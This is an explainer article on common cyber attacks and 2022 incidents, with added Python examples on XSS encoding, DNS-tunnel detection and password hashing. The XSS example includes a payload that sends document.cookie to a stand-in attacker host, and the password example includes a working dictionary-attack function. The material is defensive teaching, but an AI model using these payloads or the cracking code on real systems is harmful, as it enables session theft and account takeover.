Cyber attacks have come a long way from duping us into helping a Nigerian prince down on his luck. Cybercrime is now a global business, estimated at $43 billion and growing by at least 15 percent a year.
On average, the FBI's Internet Crime Complaint Center receives about 2,300 complaints per day reporting cyber criminal activity. Victims reported $6.9 billion in losses to those schemes in 2021 alone.
With reported global losses up 65 percent over the previous year, taking preventive measures and keeping up with current attack trends are a user's best bet for avoiding malicious online traps.
Common Types of Cyber Attacks
- Cross-site scripting (XSS)
- Denial of service (DOS or DDoS)
- DNS tunneling
- Drive-by download
- Man in the middle
- Password cracking
- SQL injection
- Zero-day exploits
What Is a Cyber Attack?
Any attempt to gain unauthorized access to one or more computers with intent to cause harm qualifies as a cyber attack.
These expensive, unwelcome attempts steal, expose, alter, disable or destroy information, most visibly through data breaches. Researchers at Cybersecurity Ventures predict that cybercrime damages will reach $10.5 trillion per year worldwide by 2025.
And with roughly 300,000 new malware samples appearing daily, it is not slowing down anytime soon.
But before we get into the top cyber attacks of 2022, it’s important to understand the many forms cybercrime can take.
17 Common Types of Cyber Attacks
So, how common is "common"?
By one widely cited estimate, a cyber attack occurs every 39 seconds; other tallies put the count at 30,000 hacks per day worldwide.
The following list outlines cybercrimes worth keeping on your radar, leading with the most frequent attack types, malware and phishing.
Malware
Malware, short for malicious software, is any program written to compromise a computer, network or server. It usually gets onto a device because a user was tricked into running it, but it can also arrive through an exploited vulnerability or a drive-by download. Once running, it can harvest data, disable security controls, establish persistence and escalate privileges, giving the attacker access to sensitive information or control of the entire system.
Malware is one of the most common forms of cyber attack, with roughly 560,000 new samples detected every day, and it does not discriminate: attacks have been waged against companies, governments and individuals, frequently delivered through phishing emails.
Mimecast, a cloud-based IT security company that screens more than one billion emails per day, surveyed 1,400 information technology and cybersecurity leaders for its latest State of Email Security report. Eight in ten organizations reported malware spreading internally from one infected employee to another. That figure, 83 percent, is a 10 percent increase over 2021 and the highest rate of infection since the report began in 2016.
The average cost of a data breach reached a record $4.35 million in 2022, up from $4.24 million the year before, according to the Cost of a Data Breach report from IBM and the Ponemon Institute, which also found that breaches in which remote work was a factor cost more than those in which it was not.
Different Types of Malware
- Ransomware: a form of cryptoviral extortion that encrypts files on a system and locks the owner out of them until a ransom is paid. Many ransomware crews now also copy the data out first and threaten to publish it if the victim refuses to pay. Cybersecurity Ventures estimated a ransomware attack every 11 seconds in 2021, at a global cost of $20 billion annually.
- Spyware: software that secretly records a user's activity and reports it back to the attacker. The category spans adware, system monitors, web trackers and trojans, all of which share one goal: install quietly, gather data, avoid detection and remove themselves once the job is done.
- Keyloggers: malware that records a user's keystrokes, capturing passwords, card numbers and private messages. The harvested data is most often used for credential theft, blackmail or identity theft.
- Trojans: malware that hides inside a seemingly legitimate piece of software. Emotet, for years one of the most widespread malware families, began as a banking trojan and evolved into a modular, self-propagating loader distributed through malicious spam attachments.
- Viruses: code that attaches itself to other programs or files and replicates when the infected host is run, slowing a device and potentially destroying data in the process. Worms are a related class that spread across a network on their own, without any user action, and often drop remote-access tools that hand attackers control of every infected host.
Phishing
Like anglers dangling bait, attackers cast lines of digital fraud out to unsuspecting users in hope of a big catch: sensitive information, or a foothold on a network from which to deploy malware. Phishing delivers malicious links or attachments straight to your inbox in messages designed to look like routine email. It runs on social engineering, the use of psychological manipulation to extract data, and the messages are often tailored to the recipient and spoofed to impersonate a party both sides trust.
By one frequently cited estimate, 91 percent of cyber attacks begin with a phishing email. In its many forms, phishing claimed 323,972 victims in 2021, per the FBI's latest Internet Crime Report, more than any other crime type.
No one is immune: a phishing campaign impersonating the U.S. Department of Labor went after victims' Office 365 credentials in January 2022, while PayPal impersonators continue to scam online consumers out of millions.
Types of Phishing Schemes
- Spear phishing: Typically through email, hackers use personal information sourced from an individual’s digital footprint — data from a person’s online activity, often lifted from social media or bought off of the Dark Web — in order to convince a specific individual to click on a fraudulent link.
- Vishing: Also known as voice phishing, this is a category reserved for hacking scams via voice calls. One in three Americans have fallen victim to fraud via phone — popularized by “scam likely” calls in recent years — racking up a total of $9.8 billion in 2021, according to an insights report conducted by TrueCaller, a smartphone call-verification company.
- Smishing: A portmanteau of SMS and phishing, this type of cyber attack exploits mobile devices and is spread via text messaging.
- Whaling: targeted attacks that go after the biggest fish, high-profile individuals such as CEOs and executives, to steal their credentials or trick them into approving fraudulent payments. Rarer than bulk phishing, these attacks pay off most when they succeed.
- Angler phishing: a newer scam that lives on social media. Working in comment sections or by direct message, fraudsters pose as a company's customer service account and trade on the trust in that brand to siphon information from customers who have posted complaints.
In July 2020, attackers used a phone spear-phishing attack against Twitter employees to reach internal account tools, took over 130 high-profile accounts and used 45 of them to promote a Bitcoin scam. The profiles, including Barack Obama, Elon Musk, Bill Gates, Jeff Bezos, Apple and Uber, each had more than a million followers. Within hours, victims had sent more than $100,000 in Bitcoin to the scammers' addresses.
Cross-Site Scripting (XSS)
Cross-site scripting, known as XSS, lets an attacker inject script into a trusted web application so that it runs in other users' browsers. Because the browser treats the script as part of the trusted site, it can read session cookies, capture keystrokes or form contents and perform actions as the victim. The injection point is typically user input that the site echoes back without encoding it, such as a search box, contact form or comment field.
Sites vulnerable to XSS include message boards, forums and any page that renders user input without screening or encoding it; bigger sites are not exempt.
In 2018, attackers injected a card-skimming script into British Airways' website, compromising roughly 380,000 booking transactions.
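As an added illustration, not code from the original article, here is the reflected-XSS pattern described above in Python: a search page that echoes the query straight into its HTML, beside the same page with the input HTML-encoded, plus the attribute-context variant where a stray quote is enough. The attack strings and the page fragments are constructed for this example.

```python
import html

# Constructed attack inputs. The first is the classic search-box payload, delivered
# by luring a victim to /search?q=<payload>; the second breaks out of a quoted attribute.
SCRIPT_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_search_unsafe(query: str) -> str:
    """Vulnerable: untrusted input is pasted straight into element content."""
    return f"<h2>Results for: {query}</h2>"


def render_search_safe(query: str) -> str:
    """Hardened: HTML-encode the input so the browser shows it as text, not markup."""
    return f"<h2>Results for: {html.escape(query, quote=True)}</h2>"


def render_input_unsafe(value: str) -> str:
    """Vulnerable: the value lands inside a quoted attribute without encoding,
    so one double quote lets the attacker append event-handler attributes."""
    return f'<input name="q" value="{value}">'


def render_input_safe(value: str) -> str:
    """Hardened: quote=True also encodes " and ', which the attribute context needs."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def has_live_script_tag(page: str) -> bool:
    """Crude indicator for this demonstration: an unencoded <script tag survived."""
    return "<script" in page.lower()


def has_injected_handler(page: str) -> bool:
    """Crude indicator for this demonstration: an unencoded onfocus=" attribute survived."""
    return 'onfocus="' in page


if __name__ == "__main__":
    print(render_search_unsafe(SCRIPT_PAYLOAD))
    print(render_search_safe(SCRIPT_PAYLOAD))
    print(render_input_unsafe(ATTRIBUTE_PAYLOAD))
    print(render_input_safe(ATTRIBUTE_PAYLOAD))
```

Encoding is context-specific: html.escape is right for element content and quoted attributes, but input placed inside a script block, a URL or a CSS rule needs that context's own encoder. A template engine with autoescaping on, plus a Content Security Policy, covers the cases a hand-written escape call misses.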
Cryptojacking
Cryptojacking is an attacker's covert use of a victim's computer to mine cryptocurrency, such as Bitcoin or Ether, without the owner's knowledge or consent, either through malware on the host or through mining scripts injected into web pages. Affected systems run slowly and burn power while the attacker pockets the coins.
Denial of Service (DOS)
Denial of service, or DoS, relies on a single tactic: overwhelm the target. Typically this means flooding servers with traffic or bogus requests until the system can no longer serve some or all legitimate ones.
The goal is not to steal data but to knock services offline. In February 2020, Amazon Web Services reported mitigating the largest publicly disclosed DDoS attack at the time, which peaked at 2.3 terabits per second. A distributed denial of service (DDoS) attack generates the flood from many sources at once, usually a botnet of compromised machines or abused reflection services, which makes it far harder to filter than traffic from a single host.
DNS Spoofing
DNS spoofing sends users to a fraudulent site that mimics their intended destination, such as a bank or social media login page, by answering their name lookups with an attacker-controlled IP address. Anything the user types into the fake page goes straight to the attacker waiting at the other end.
Such incidents can be used to sabotage companies by redirecting visitors to an offensive site, or simply to pull pranks. In 2015, a group known only as Lizard Squad hijacked the DNS of Malaysia Airlines' website, replacing the homepage with an image of a plane and the text "404 – Plane Not Found," a reference to Flight 370, which had disappeared the year before. No customer data was reported stolen, but the airline lost control of its site for several hours.
DNS Tunneling
Even the most widely trusted protocols, like the domain name system, can be subverted. DNS acts as the internet's phonebook, translating domain names into IP addresses, and because almost every network must let DNS traffic out, firewalls rarely inspect it closely. DNS tunneling abuses that trust by encoding data inside DNS queries and responses to an attacker-controlled domain, smuggling commands in and stolen data out past the firewall. It is distinct from DNS hijacking and cache poisoning, which redirect lookups rather than carry data.
DNS tunneling is especially hazardous because it often goes undetected for an extended period, during which attackers can exfiltrate sensitive data, issue commands to implants and install new access points or malware.
Nearly three-quarters of organizations suffered a DNS attack in 2021, according to a study of 302 security professionals by the Neustar International Security Council, a group of cybersecurity leaders across key industries and companies.
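As an added example that is not from the original article, here is a small detector in Python that applies the heuristics defenders actually use against tunneling: per-domain query volume, long random-looking subdomains, labels that never repeat and a skew toward TXT records. The resolver log lines are constructed for this example, and splitting a name on its last two labels is a simplifying assumption; a production tool would consult the Public Suffix List.

```python
import math
from collections import defaultdict

# Constructed resolver log, one query per line: "<client> <qtype> <qname>".
# The evil-tunnel.test queries mimic a tunnel: long, random-looking labels that never
# repeat, because each one carries a fresh chunk of encoded data.
SAMPLE_LOG = """\
10.0.0.5 A www.example.com
10.0.0.5 A cdn.example.com
10.0.0.7 A mail.example.com
10.0.0.9 TXT 3q2b7h9k1mzx8v4n.5p0r6t2y9w3e8a1d.evil-tunnel.test
10.0.0.9 TXT 8v4n3q2b7h9k1mzx.9w3e8a1d5p0r6t2y.evil-tunnel.test
10.0.0.9 TXT 1mzx8v4n3q2b7h9k.6t2y9w3e8a1d5p0r.evil-tunnel.test
10.0.0.9 TXT 2b7h9k1mzx8v4n3q.2y9w3e8a1d5p0r6t.evil-tunnel.test
10.0.0.9 TXT 7h9k1mzx8v4n3q2b.8a1d5p0r6t2y9w3e.evil-tunnel.test
10.0.0.5 A www.example.com
"""


def shannon_entropy(text: str) -> float:
    """Bits per character: encoded data scores high, ordinary hostnames score low."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Naive (subdomain, registered domain) split on the last two labels.
    Assumption for this example only; real tooling uses the Public Suffix List."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def find_tunnel_candidates(log_text: str, min_queries: int = 5, min_avg_len: int = 20,
                           min_avg_entropy: float = 3.0, min_unique_ratio: float = 0.9) -> dict:
    """Return {domain: [reasons]} for domains whose query pattern looks like a tunnel."""
    per_domain = defaultdict(lambda: {"n": 0, "subs": set(), "len": 0, "ent": 0.0, "txt": 0})
    for line in log_text.splitlines():
        _client, qtype, qname = line.split()
        sub, domain = split_name(qname)
        d = per_domain[domain]
        d["n"] += 1
        d["subs"].add(sub)
        d["len"] += len(sub)
        d["ent"] += shannon_entropy(sub)
        d["txt"] += int(qtype == "TXT")
    flagged = {}
    for domain, d in per_domain.items():
        if d["n"] < min_queries:        # too few queries to judge
            continue
        reasons = []
        if d["len"] / d["n"] >= min_avg_len:
            reasons.append("long subdomains")
        if d["ent"] / d["n"] >= min_avg_entropy:
            reasons.append("high-entropy labels")
        if len(d["subs"]) / d["n"] >= min_unique_ratio:
            reasons.append("subdomains never repeat")
        if d["txt"] / d["n"] >= 0.5:
            reasons.append("mostly TXT queries")
        if len(reasons) >= 2:           # require two independent signals to cut false positives
            flagged[domain] = reasons
    return flagged


if __name__ == "__main__":
    for domain, reasons in find_tunnel_candidates(SAMPLE_LOG).items():
        print(domain, "->", ", ".join(reasons))
```

Legitimate services (CDNs, some antivirus and telemetry products) also generate long unique subdomains, which is why the detector insists on two signals and why an allow-list belongs in front of it in practice.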
Drive-by Download
Most cyber attacks require interaction from a user, like clicking a link or opening an attachment. Drive-by downloads do not: they exploit vulnerabilities in the browser or its plugins to install malware when a user simply visits a compromised or malicious website, or interacts with a deceptive pop-up window.
Insider Threats
As the name suggests, insider threats originate from within an organization: a current or former employee, contractor or vendor who misuses legitimate access to leak, steal or destroy internal data. Not every insider incident is malicious, since careless handling of data by well-meaning staff is a large share of the problem, but a disgruntled insider with valid credentials can do the most damage.
For example, early in the COVID-19 pandemic a disgruntled former employee of a medical device packaging company used administrator access to alter or delete more than 100,000 company records, disrupting shipments of personal protective equipment.
The average cost of insider threats rose from $11.45 million in 2019 to $15.30 million in 2021.
Internet of Things Attack (IoT Attack)
IoT attacks compromise internet-connected consumer devices such as smart speakers, TVs, cameras and connected toys, usually through default passwords or unpatched firmware, and then use them as a foothold into the home network or as soldiers in a DDoS botnet. These devices rarely run endpoint protection and seldom receive updates, which makes them easy targets.
In some cases attackers herd whole armies of such devices, called botnets, against other targets; the Mirai botnet that knocked out the DNS provider Dyn in 2016 was built largely from compromised cameras and home routers. A compromised speaker, Ring doorbell or even smart fridge may show no symptom beyond sluggish, zombie-like performance.
Man in the Middle (MITM)
When an uninvited third party sits between two communicating parties and relays or alters their traffic, say, on a public Wi-Fi network the attacker controls, that is a man-in-the-middle attack.
Messages between the two parties are intercepted and manipulated to suit the attacker, who impersonates each side to the other, while the real parties remain unaware that their conversation is being tampered with. Properly validated TLS defeats this: the attacker cannot present a certificate the victim's client will accept for the real domain, which is why certificate warnings should never be clicked through.
A Look at a Similar Attack: Man on the Side
A man-on-the-side attack enables rogue intruders to read and inject arbitrary messages into a communications channel, without modifying or deleting messages sent by other parties. This tactic relies on strategic timing so that replies containing the malicious data are sent in response to a victim’s request before an actual response from the server.
Investigators at Check Point Research uncovered the “ultimate” MITM heist in 2019, when hackers diverted $1 million in venture capital funding intended for an Israeli startup to an attacker-controlled bank account in an elaborate wire transfer email scam.
Password Cracking
Perhaps the most direct approach, password cracking is the recovery of passwords, either by guessing them against a live login or by testing candidates offline against stolen password hashes.
Types of Password Cracking Attacks
- Brute-force: a trial-and-error approach that tries every possible character combination (or every entry in a word list) and checks each one against the stored cryptographic hash until a match lands.
- Password spraying: often automated, the attacker tries a short list of common passwords, such as "123456," "qwerty" or "password," against many accounts, one or two attempts each, to stay beneath account-lockout thresholds.
- Social engineering: As seen in phishing attacks, hackers may try to manipulate a user by impersonating a trusted entity, like a friend or a bank.
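The attack types above, and the defenses against them, as an added Python example that is not part of the original article: an offline dictionary attack against unsalted SHA-256 hashes, the salted and deliberately slow hash that defeats that precomputation, and a log-shape classifier that tells a password spray from a brute-force run. The word list, the leaked table and the authentication log are constructed for the example, and the PBKDF2 iteration count follows current OWASP guidance.

```python
import hashlib
import hmac
import os
from collections import defaultdict

# Constructed word list and a constructed "leaked" table of unsalted SHA-256 hashes.
WORDLIST = ["123456", "password", "qwerty", "letmein", "Summer2022!", "hunter2"]


def sha256_hex(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


LEAKED_UNSALTED = {
    "alice": sha256_hex("Summer2022!"),
    "bob": sha256_hex("hunter2"),
    "carol": sha256_hex("correct horse battery staple"),
}


def dictionary_attack(hashes: dict, wordlist: list) -> dict:
    """Offline cracking of unsalted, fast hashes: hash the word list once, then every
    user whose stored hash appears in the table falls to a single dictionary lookup."""
    table = {sha256_hex(word): word for word in wordlist}
    return {user: table[h] for user, h in hashes.items() if h in table}


def hash_password(password: str, salt: bytes = None, iterations: int = 600_000) -> tuple:
    """Salted, deliberately slow PBKDF2-HMAC-SHA256. A random per-user salt makes the
    precomputed table useless and the iteration count makes every guess expensive."""
    salt = os.urandom(16) if salt is None else salt
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def verify_password(password: str, salt: bytes, digest: bytes, iterations: int = 600_000) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)   # constant-time comparison


# Constructed authentication log: "<timestamp> <result> user=<name> src=<ip>".
# 203.0.113.9 tries one password across many accounts (a spray; the OK line is the
# account it got into). 198.51.100.7 hammers a single account (online brute force).
AUTH_LOG = """\
2022-06-01T09:00:01 FAIL user=alice src=203.0.113.9
2022-06-01T09:00:02 FAIL user=bob src=203.0.113.9
2022-06-01T09:00:03 FAIL user=carol src=203.0.113.9
2022-06-01T09:00:04 FAIL user=dave src=203.0.113.9
2022-06-01T09:00:05 OK user=erin src=203.0.113.9
2022-06-01T09:00:06 FAIL user=alice src=198.51.100.7
2022-06-01T09:00:07 FAIL user=alice src=198.51.100.7
2022-06-01T09:00:08 FAIL user=alice src=198.51.100.7
2022-06-01T09:00:09 FAIL user=alice src=198.51.100.7
2022-06-01T09:00:10 FAIL user=alice src=198.51.100.7
2022-06-01T09:00:11 FAIL user=alice src=198.51.100.7
2022-06-01T09:00:12 FAIL user=bob src=10.0.0.5
"""


def classify_sources(log_text: str, spray_min_users: int = 4, spray_max_per_user: int = 2,
                     brute_min_attempts: int = 5) -> dict:
    """Label each source IP by the shape of its failed logins: many users with one or
    two tries each is a spray (it stays under per-account lockouts); many tries on
    one user is brute force; anything else is treated as normal."""
    failures = defaultdict(lambda: defaultdict(int))  # src -> user -> failed attempts
    for line in log_text.splitlines():
        _ts, result, user_kv, src_kv = line.split()
        if result != "FAIL":
            continue
        failures[src_kv.split("=", 1)[1]][user_kv.split("=", 1)[1]] += 1
    labels = {}
    for src, per_user in failures.items():
        if len(per_user) >= spray_min_users and max(per_user.values()) <= spray_max_per_user:
            labels[src] = "spray"
        elif max(per_user.values()) >= brute_min_attempts:
            labels[src] = "brute-force"
        else:
            labels[src] = "normal"
    return labels
```

A per-account lockout catches the brute-force source but never fires on the spray, whose single success against erin is invisible unless failures are also counted per source address; that is why spray detection has to aggregate by source, not by user.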
Rootkits
Often packaged as a collection of tools, rootkits are malware that embeds deep in an operating system, in the kernel, drivers or even firmware. Installing one requires privileged access, obtained beforehand through phishing, password cracking or an exploit.
Rootkits give the attacker persistent administrative control while hiding their own files, processes and network connections, so evidence of the intrusion is covered up. Because a kernel-level rootkit sits beneath the antivirus, it can subvert the security software itself; the reliable remedy is usually to wipe the machine and reinstall from trusted media.
Session Hijacking
Also known as cookie hijacking or sidejacking, session hijacking occurs when an attacker takes over an authenticated session between a client and a server. Once a user logs in, the server identifies them by a session token, usually a cookie; an attacker who steals that token, by sniffing unencrypted traffic, through XSS or with malware on the client, can present it and be treated as the logged-in user without ever knowing the password. HTTPS everywhere, the HttpOnly and Secure cookie flags and short session lifetimes limit the exposure.
SQL Injection
Structured Query Language (SQL) is the language most web applications use to talk to their databases. In a SQL injection attack, the attacker supplies input that the application pastes into a query without separating code from data, so the database executes SQL the attacker wrote rather than what the developer intended.
The aims include spoofing identity (logging in as another user), tampering with existing data, causing repudiation problems such as voiding transactions or changing balances, gaining administrative control of the database server, and exposing, destroying or corrupting data. Parameterized queries, which bind user input as data rather than splicing it into the SQL text, are the standard defense.
URL Manipulation
URL manipulation, or rewriting, alters the parameters or path of a URL to redirect a victim to a phishing site, trigger a malware download or reach content the site never meant to expose.
For example, many sites publish shortened URLs for convenience. Because a shortened link hides its destination, attackers can craft look-alike short links that lead to a phishing trap instead. Attackers also guess predictable paths, appending "/admin" or "/.bak" and the like to a site's address, to find unlinked administrative pages or leftover backup files on the web server, a technique known as forced browsing.
Zero-Day Exploits
A zero-day exploit targets a vulnerability the software's vendor does not yet know about or has not yet patched, so defenders have had "zero days" to fix it. The software need not be new; the flaw is simply undiscovered or unfixed. The goal is usually to steal data or cause damage before a patch ships.
Microsoft, Google and Apple all had to patch zero-day bugs in the first few months of 2022.
One of the most dangerous vulnerabilities in recent memory, Log4Shell (CVE-2021-44228), was disclosed in December 2021 in Log4j, a Java logging library so ubiquitous across consumer and enterprise systems, from Apple's iCloud to Amazon, that much of the internet was exposed.
Major Cyber Attacks in 2022
Individuals, governments and companies: it can happen to anyone. Here are the top five cyber attacks of this year.
Google and Facebook Scammed Out of $100 Million
Though the fraud itself ran from 2013 to 2015, it remains the benchmark for social engineering at scale: a scammer sent phishing emails to Google and Facebook employees and, over two years, got the tech giants to pay more than $100 million into accounts he controlled. The messages carried invoices for goods and services that a real hardware supplier had genuinely delivered, but directed payment to fraudulent bank accounts.
In 2019, Lithuanian national Evaldas Rimasauskas pleaded guilty to wire fraud for the scheme. He had registered a company with the same name as Quanta Computer, a Taiwanese hardware maker that supplied both Google and Facebook, and opened bank accounts in that name to receive the payments.
U.S. Department of Labor Imitated in an Email Phishing Attack
A sophisticated phishing campaign that impersonated the U.S. Department of Labor to steal Office 365 credentials made headlines as a landmark in how convincing phishing attempts have become.
The January 2022 attack impersonated the department's email address in two ways, spoofing the real domain ("[email protected][.]gov") and buying look-alike domains ("dol-gov[.]com" and "dol-gov[.]us"), and the messages slipped past secure email gateways undetected.
The emails were professionally written and carried official government branding, inviting recipients to bid on a government project through links and attachments that led to a credential-harvesting page dressed up as a bidding portal.
Digital Warfare: Russia vs. Ukraine
Ukrainian government agencies and non-governmental organizations have dealt with Russian cyber operations for years, including attacks that caused power blackouts, election interference, data breaches and destructive wiper malware on servers across the country.
Then, as the invasion began in February 2022, Microsoft warned of a new spear phishing campaign by the Russian-linked group Gamaredon. According to Microsoft's findings, the group had been targeting "organizations critical to emergency response and ensuring the security of Ukrainian territory" since October 2021.
Ukraine has since formed a volunteer "IT Army" focused on mounting DDoS attacks, and hacktivists from around the world have taken up digital arms on its behalf. As a result, Russia has suffered data breaches and service disruptions at "an unprecedented scale," Matt Burgess reported for Wired.
Data Theft From Healthcare Providers
In June, Massachusetts-based Shields Health Care Group disclosed a breach in which attackers had access to its network in March; data on about two million people, including names, Social Security numbers, birth dates, addresses, billing information and medical information, may have been exposed.
In Texas, Baptist Health System and Resolute Health Hospital announced a similar breach in June. Kaiser Permanente and Yuma Regional Medical Center in Arizona also disclosed breaches that month, affecting a combined 770,000 patients.
DeFi Platform Hacks
Rapid expansion of the cryptocurrency ecosystem has come with steep losses.
At the end of March, North Korean attackers known as the Lazarus Group used stolen validator private keys to drain the Ronin bridge, the sidechain behind the game Axie Infinity, of Ethereum and USDC stablecoin worth about $625 million at the time.
That followed a February attack on the Wormhole bridge, where an attacker exploited a signature-verification flaw to mint 120,000 wrapped ether worth about $320 million. In April, attackers hit the stablecoin protocol Beanstalk, using a flash loan to seize a governance majority and walk off with about $182 million in cryptocurrency.
According to the REKT Database, which tracks DeFi scams, hacks and exploits, DeFi protocols have lost $4.75 billion to such incidents since inception, with only about $1 billion recovered.
How to Prevent Cyber Attacks
Because you can never be too safe, here are some best practices to consider when taking preventative action against cyber criminals:
- Install antivirus software with malware protection. If you click a malicious link or open an infected attachment, endpoint protection can often block or quarantine known malware before it runs, though it is no guarantee against new or targeted threats.
- Double down with a firewall. They act as the first defense between a computer and the internet.
- Back up your data regularly, and keep at least one copy offline or otherwise out of reach of ransomware. In a worst-case scenario, a tested backup can avert downtime, data loss and financial loss.
- Use strong, unique passwords and enable multi-factor authentication. Length matters more than complexity: a passphrase of 12 or more characters beats a short string of symbols, and a password manager makes a unique password per site practical. Multi-factor authentication adds a second check that a stolen password alone cannot pass.
- Clue in on phishing attacks. Unsolicited emails, texts, direct messages, attachments and calls are always suspect. Messages from generic email domains (addresses ending in @gmail.com or @yahoo.com) claiming to be a company, fabricated logos, poor grammar and spelling errors are classic tells, as are scare tactics: an urgent or threatening tone is meant to provoke the victim into acting before thinking. Remember: legitimate companies will not ask for passwords or other sensitive information via email, and the safest response to an unexpected message is to contact the organization through a channel you already trust.
- Keep up with trends. Phishing tactics will only become more convincing over time. Knowing which mass scams are in circulation, like PayPal and Internal Revenue Service imitators, may help curb rash reactions to alarming notifications.
- Blue mark or bust. An official support page or account for a company should be verified and linked directly from the company's main site. For smaller businesses too new for verification, check the account's history of customer interactions yourself, and avoid accounts with only a few followers and no posts.
- Surf securely. A locked padlock next to the URL means the site has a valid TLS certificate and the connection is encrypted (HTTPS). It does not mean the site is legitimate: phishing sites use HTTPS too, so check the domain name itself.
- Software updates are your friend. Keeping up to date on your devices boosts security as hackers plot their attacks on vulnerabilities found in outdated software.
- Connect to a VPN when using public Wi-Fi. HTTPS already protects most traffic, but a VPN also hides your DNS lookups and destinations from the hotspot operator and anyone else on the network, even for something as routine as checking your email.
- Avoid oversharing on social media. Everything shared online becomes part of a user’s digital footprint, which hackers will use to infer passwords and security questions clues, or launch social engineering attacks.